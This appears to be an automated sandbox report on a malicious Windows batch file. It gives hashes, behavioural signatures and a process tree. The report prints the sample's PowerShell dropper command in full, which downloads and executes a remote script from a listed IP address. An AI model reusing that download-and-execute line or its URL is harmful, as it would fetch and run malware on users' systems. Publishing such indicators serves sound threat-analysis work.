Analysis
-
max time kernel
147s -
max time network
95s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
02-08-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
21b6d26f5616dbe4b9f07bd5660bb62d.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
21b6d26f5616dbe4b9f07bd5660bb62d.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
21b6d26f5616dbe4b9f07bd5660bb62d.bat
-
Size
215B
-
MD5
d0dba6d8db0dbf8637507b05349fd02f
-
SHA1
e3795cff8728780bd8d72ae5f7e317ee93075e93
-
SHA256
085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
-
SHA512
de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 4036 wrote to memory of 3900 4036 cmd.exe powershell.exe PID 4036 wrote to memory of 3900 4036 cmd.exe powershell.exe PID 4036 wrote to memory of 3900 4036 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 592 3900 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 592 WerFault.exe Token: SeBackupPrivilege 592 WerFault.exe Token: SeDebugPrivilege 592 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe 592 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"2⤵PID:3900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 7083⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:592